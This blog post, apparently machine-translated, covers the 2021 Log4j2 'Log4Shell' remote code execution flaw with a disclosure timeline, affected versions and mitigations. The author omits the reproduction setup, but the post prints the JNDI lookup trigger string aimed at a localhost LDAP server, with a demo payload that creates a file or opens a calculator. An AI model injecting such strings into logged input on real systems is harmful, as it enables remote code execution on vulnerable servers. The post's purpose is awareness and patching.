Like and see, unlimited power. Wechat search “program ape Alang”.
This article Github.com/niumoo/Java… And unread code sites have been included, there are many knowledge points and a series of articles.
Before December 10, 2021, log4j’s nuclear bomb vulnerability was exposed on the Internet. This vulnerability is extremely high risk, easy to operate, easy to exploit, and applicable to a wide range of applications. It can directly execute arbitrary code and take over your server.
Here I think about the reason why the exposer exposed early in the morning, or chose to expose early in the morning, thinking that countless engineers got up in the middle of the night to repair the emergency, so that TA had abnormal pleasure.
I know what you want to see, you want to see how to show it, but let’s see how to fix it first, just to raise security awareness.
0x01. Vulnerability situation
Apache Log4j2 is an excellent Java logging framework. Because Apache Log4j2 has some recursive parsing functions, attackers can directly construct malicious requests and trigger remote code execution vulnerabilities. No special configuration is required for vulnerability exploitation.
Here is the vulnerability disclosure level.
Vulnerability details | Vulnerability PoC | Vulnerability EXP | In opposition to use |
---|---|---|---|
public | public | public | There are |
Through the online public information, the details of this vulnerability has been fully disclosed, here is a simple demonstration, so that we understand the vulnerability, security upgrade as soon as possible.
According to the online public news, the following chronology can be sorted out:
-
On November 24, 2021, Ali Cloud security team reported Apache Log4j2 remote code execution vulnerability to Apache officials.
-
On December 06, 2021, log4j2 released the fix package log4J-2.15.0-rc1.jar
-
On December 10, 2021, log4j2 released the fix package log4J-2.15.0-rc2.jar
-
On December 10, 2021, Ali Cloud security team found that Apache Log4j 2.15.0-RC1 version has a vulnerability bypass, please update to Apache Log4j 2.15.0-rC2 version in time.
The actual affected areas are as follows:
Apache Log4j 2.x < 2.15.0-rc2
0x02. Security Suggestions
-
Check whether the Apache Log4J-Core Jar package is imported into the application. If dependencies are imported and the version is in the affected range, vulnerabilities may be affected. Please update Apache Log4j2 to the latest log4J-2.15.0-rc2 at github.com/apache/logg…
-
Upgrade known affected applications and components, such as spring-boot-starter-log4j2/Apache Struts2/Apache Solr/Apache Druid/Apache Flink
-
Temporary mitigation programmes. The JDK version can be upgraded to more than 6U211/7U201/8U191/11.0.1, which can limit JNDI and other vulnerability exploitation methods to a certain extent. For more than 2.10 version of Log4j, can be installed log4j2. FormatMsgNoLookups is True, or remove from the classpath JndiLookup class, Log4j – core – such as zip – q – d *. Jar org/apache/logging/log4j/core/lookup/JndiLookup. Class
0x03. Vulnerability reoccurrence
The following tests are for study and analysis only, not for other purposes! Standalone demo, all addresses are 127.0.0.1.
Had not prepared to paint, but many students think that injection vulnerabilities is simply run online ${jndi: ldap: / / 127.0.0.1:1389 / Log4jTest}, I think it’s necessary to draw a simple diagram explain, a simple attack link step figure, painting rushed to forgive me.
3.1. Environment simulation – Victim service establishment
It was deleted here. It didn’t feel good after it was posted, and it might be used by people with other intentions. Want to know the direct wechat search program ape Alang communication,
3.2. Environmental Inkblot – Attacker simulation
It was deleted here. It didn’t feel good after it was posted, and it might be used by people with other intentions. Want to know the direct wechat search program ape Alang communication,
3.3. Test
The victim service is running again with a simple line of logs, but now a line of instructions.
Harmless test, no offensive, Linux/MAC create text: xxxYYYZZz.txt; Windows popup calculator. Finally seek attention, number: public program ape man 20:21:57. [the main] 780 ERROR Log4j2 - params: ${jndi: ldap: / / 127.0.0.1:1389 / Log4jTest}Copy the code
Running the project directory at the same time has a file xxxYYYzzz.txt
If you are running the test on Windows, a calculator pops up.
As always, the code for this article is at: github.com/niumoo/lab-…
After < >
Hello world:) I’m Aaron, a tech tool guy on the front line.
This article is constantly updated, you can follow the public account “Program Ape Alang” or visit the unread code blog (https://www.wdbyte.com).
This article Github.com/niumoo/Java… Welcome to Star!